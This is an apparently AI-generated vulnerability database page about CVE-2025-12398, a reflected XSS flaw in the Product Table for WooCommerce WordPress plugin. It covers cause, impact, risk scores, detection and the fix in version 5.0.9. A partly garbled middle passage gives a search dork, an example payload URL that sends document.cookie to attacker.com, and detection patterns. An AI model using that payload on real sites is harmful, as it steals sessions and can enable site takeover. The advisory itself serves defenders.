
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-12398 is a Reflected Cross-Site Scripting (XSS) vulnerability in the Product Table for WooCommerce WordPress plugin, developed by woobewoo/codersaiful. The flaw exists in all versions up to and including 5.0.8, stemming from insufficient input sanitization and output escaping of the search_key parameter. It was published on December 21, 2025, with Wordfence credited as the assigning authority. The vulnerability carries a CVSS v3.1 base score of 6.1 (Medium) (Wordfence, Red Hat CVE).
The root cause is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting). The search_key parameter accepted by the plugin is neither properly sanitized on input nor escaped on output, allowing arbitrary JavaScript to be reflected back in the HTTP response. Because the attack vector is network-based and requires no authentication or elevated privileges, an unauthenticated attacker can craft a malicious URL containing a JavaScript payload and deliver it to a victim; when the victim clicks the link, the script executes in their browser within the context of the target WordPress site (CAPEC-591: Reflected XSS) (Wordfence, ENISA EUVD).
Successful exploitation allows an attacker to execute arbitrary JavaScript in the browser of any user who clicks a crafted link, operating within the security context of the affected WordPress site. This can lead to session cookie theft, credential harvesting, defacement of page content visible to the victim, or redirection to malicious sites. While confidentiality and integrity impacts are rated Low and availability is unaffected, administrative users tricked into clicking such a link could expose privileged session tokens, potentially enabling site takeover (Wordfence, ENISA EUVD).
No public exploit code or active in-the-wild exploitation has been reported as of the time of publication. The EPSS score is approximately 0.074%, indicating a low probability of exploitation in the near term. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. User interaction is required (the victim must click a crafted link), which limits opportunistic mass exploitation, though phishing campaigns targeting WordPress site administrators remain a realistic attack scenario (Wordfence, Feedly).
inurl:woo-product-table).search_key GET/POST parameter.search_key parameter, for example:https://victim-site.com/shop/?search_key=<script>document.location='https://attacker.com/steal?c='+document.cookie</script>search_key with encoded script tags.search_key values containing <script>, javascript:, onerror=, or URL-encoded equivalents (e.g., %3Cscript%3E).search_key value; reports from users of unexpected redirects after clicking product table links.Site owners should update the Product Table for WooCommerce plugin to version 5.0.9 or later, which addresses the insufficient sanitization and escaping of the search_key parameter. The fix is documented in the WordPress plugin repository changeset (WordPress Changeset). As an interim measure, a Web Application Firewall (WAF) rule blocking reflected XSS patterns in the search_key parameter can reduce exposure. Administrators should also ensure WordPress user accounts use strong, unique passwords and enable multi-factor authentication to limit the impact of any session compromise (Wordfence).
The vulnerability was reported and assigned by Wordfence, a leading WordPress security firm, as part of their routine plugin vulnerability disclosure program. It was also indexed by ENISA's European Vulnerability Database (EUVD-2025-204661) and noted by automated CVE tracking accounts on Bluesky. No significant independent researcher commentary or major media coverage has been identified beyond standard vulnerability database aggregation (Wordfence, ENISA EUVD).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."